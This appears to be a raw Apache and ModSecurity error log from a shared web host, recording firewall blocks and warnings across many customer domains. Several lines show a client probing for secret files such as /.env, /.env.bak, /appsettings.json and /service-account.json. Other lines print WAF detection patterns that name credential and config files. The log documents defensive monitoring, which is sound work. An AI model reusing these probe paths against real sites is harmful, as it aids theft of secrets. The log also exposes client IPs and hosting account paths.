[Tue May 26 13:03:32.641221 2026] [security2:error] [pid 470766:tid 470984] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ameritradeng.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73NgAAAFg"]
[Tue May 26 13:03:32.641821 2026] [security2:error] [pid 470766:tid 470947] [client 46.151.182.172:60952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ameritradeng.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73GgAAADM"]
[Tue May 26 13:03:32.657786 2026] [security2:error] [pid 470766:tid 470956] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "friendsalongtheway.net.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73OwAAADw"]
[Tue May 26 13:03:32.658215 2026] [security2:error] [pid 470766:tid 470947] [client 46.151.182.172:60974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "friendsalongtheway.net.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73OAAAADM"]
[Tue May 26 13:03:32.697826 2026] [security2:error] [pid 470766:tid 470996] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73LwAAAGQ"]
[Tue May 26 13:03:32.702425 2026] [security2:error] [pid 470766:tid 470898] [client 46.151.182.172:60956] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73IQAAAAI"]
[Tue May 26 13:03:32.752873 2026] [security2:error] [pid 470766:tid 470979] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "lmialumni.org.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73EQAAAFM"]
[Tue May 26 13:03:32.753495 2026] [security2:error] [pid 470766:tid 470994] [client 46.151.182.172:60940] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "lmialumni.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73AQAAAGI"]
[Tue May 26 13:03:32.882736 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:62399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73SgAAAC0"]
[Tue May 26 13:03:32.882907 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:62399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73SgAAAC0"]
[Tue May 26 13:03:32.891922 2026] [security2:error] [pid 470766:tid 470976] [client 46.151.182.172:60945] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "rethinkinclusion.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73DAAAAFA"]
[Tue May 26 13:03:32.906636 2026] [security2:error] [pid 470766:tid 470935] [client 46.151.182.172:60955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ellastylze.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73GwAAACc"]
[Tue May 26 13:03:33.223808 2026] [core:crit] [pid 470766:tid 470952] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:03:33.424798 2026] [security2:error] [pid 470766:tid 470972] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73IgAAAEw"]
[Tue May 26 13:03:33.427252 2026] [security2:error] [pid 470766:tid 471003] [client 46.151.182.172:61139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "obinnawrites.com"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73YAAAAGs"]
[Tue May 26 13:03:33.427707 2026] [security2:error] [pid 470766:tid 470961] [client 46.151.182.172:60939] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ72_wAAAEE"]
[Tue May 26 13:03:33.673174 2026] [security2:error] [pid 470766:tid 470898] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "lmialumni.org"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73aAAAAAI"]
[Tue May 26 13:03:33.674837 2026] [security2:error] [pid 470766:tid 470956] [client 46.151.182.172:61151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "lmialumni.org"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73YgAAADw"]
[Tue May 26 13:03:34.213789 2026] [security2:error] [pid 470766:tid 470954] [client 45.45.237.225:38494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env"] [unique_id "ahVMzujO_W1DqEcFHQ73jgAAADo"]
[Tue May 26 13:03:34.278788 2026] [security2:error] [pid 470766:tid 470943] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ722QAAAC8"]
[Tue May 26 13:03:34.284779 2026] [security2:error] [pid 470766:tid 470989] [client 46.151.182.172:60912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ721gAAAF0"]
[Tue May 26 13:03:34.289217 2026] [security2:error] [pid 470766:tid 470918] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73JQAAABY"]
[Tue May 26 13:03:34.289814 2026] [security2:error] [pid 470766:tid 470973] [client 46.151.182.172:60928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ728AAAAE0"]
[Tue May 26 13:03:34.393560 2026] [security2:error] [pid 470766:tid 471004] [client 45.45.237.225:38498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.bak"] [unique_id "ahVMzujO_W1DqEcFHQ73mQAAAGw"]
[Tue May 26 13:03:34.430543 2026] [security2:error] [pid 470766:tid 471018] [client 45.45.237.225:38494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.backup"] [unique_id "ahVMzujO_W1DqEcFHQ73nAAAAHo"]
[Tue May 26 13:03:34.498773 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.498893 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.499649 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.499731 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.587575 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73hQAAACw"]
[Tue May 26 13:03:34.835085 2026] [security2:error] [pid 470766:tid 470958] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73xAAAAD4"]
[Tue May 26 13:03:34.835673 2026] [security2:error] [pid 470766:tid 470896] [client 46.151.182.172:61405] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73wAAAAAA"]
[Tue May 26 13:03:34.842320 2026] [security2:error] [pid 470766:tid 470967] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73wwAAAEc"]
[Tue May 26 13:03:34.842843 2026] [security2:error] [pid 470766:tid 471021] [client 46.151.182.172:61404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73vwAAAH0"]
[Tue May 26 13:03:34.859837 2026] [security2:error] [pid 470766:tid 470970] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73jQAAAEo"]
[Tue May 26 13:03:35.007119 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandranks.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731AAAAGI"]
[Tue May 26 13:03:35.007136 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-smhonors.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731gAAAE8"]
[Tue May 26 13:03:35.007184 2026] [security2:error] [pid 470766:tid 470927] [client 45.45.237.225:38630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandofficers.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731QAAAB8"]
[Tue May 26 13:03:35.007224 2026] [security2:error] [pid 470766:tid 471023] [client 45.45.237.225:38752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-history.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731wAAAH8"]
[Tue May 26 13:03:35.007285 2026] [security2:error] [pid 470766:tid 470999] [client 45.45.237.225:38580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/index.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732AAAAGc"]
[Tue May 26 13:03:35.007592 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007669 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007779 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-overview.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732wAAAGI"]
[Tue May 26 13:03:35.007879 2026] [security2:error] [pid 470766:tid 470902] [client 45.45.237.225:38582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-provincesandcourts.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732QAAAAY"]
[Tue May 26 13:03:35.007892 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-grand.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733QAAAE8"]
[Tue May 26 13:03:35.008429 2026] [security2:error] [pid 470766:tid 470898] [client 45.45.237.225:38542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-india.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732gAAAAI"]
[Tue May 26 13:03:35.041634 2026] [security2:error] [pid 470766:tid 471014] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73VwAAAHY"]
[Tue May 26 13:03:35.043461 2026] [security2:error] [pid 470766:tid 470982] [client 46.151.182.172:61028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73VQAAAFY"]
[Tue May 26 13:03:35.082938 2026] [security2:error] [pid 470766:tid 470919] [client 45.45.237.225:38570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-scarletmantle.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734gAAABc"]
[Tue May 26 13:03:35.083258 2026] [security2:error] [pid 470766:tid 470976] [client 45.45.237.225:38666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-contact.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734wAAAFA"]
[Tue May 26 13:03:35.083287 2026] [security2:error] [pid 470766:tid 470974] [client 45.45.237.225:38494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-privacy.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735wAAAE4"]
[Tue May 26 13:03:35.083496 2026] [security2:error] [pid 470766:tid 470935] [client 45.45.237.225:38520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-regalia.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736AAAACc"]
[Tue May 26 13:03:35.083548 2026] [security2:error] [pid 470766:tid 470959] [client 45.45.237.225:38720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-summons.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735AAAAD8"]
[Tue May 26 13:03:35.083709 2026] [security2:error] [pid 470766:tid 470993] [client 45.45.237.225:38556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-forms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735gAAAGE"]
[Tue May 26 13:03:35.083886 2026] [security2:error] [pid 470766:tid 470960] [client 45.45.237.225:38676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athlestan-faq.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736wAAAEA"]
[Tue May 26 13:03:35.083969 2026] [security2:error] [pid 470766:tid 470964] [client 45.45.237.225:38502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-terms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736gAAAEQ"]
[Tue May 26 13:03:35.084142 2026] [security2:error] [pid 470766:tid 470938] [client 45.45.237.225:38694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-disclaimer.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735QAAACo"]
[Tue May 26 13:03:35.132322 2026] [security2:error] [pid 470766:tid 470953] [client 46.151.182.172:61293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73igAAADk"]
[Tue May 26 13:03:35.168557 2026] [autoindex:error] [pid 470766:tid 470948] [client 45.45.237.225:38498] AH01276: Cannot serve directory /home2/svijakqj/athelstan.org.in/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://athelstan.org.in/images
[Tue May 26 13:03:35.525464 2026] [security2:error] [pid 470766:tid 470899] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73WwAAAAM"]
[Tue May 26 13:03:35.526771 2026] [security2:error] [pid 470766:tid 470998] [client 46.151.182.172:61037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73WAAAAGY"]
[Tue May 26 13:03:36.772815 2026] [security2:error] [pid 470766:tid 470935] [client 4.201.75.230:46060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-cron.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74PgAAACc"]
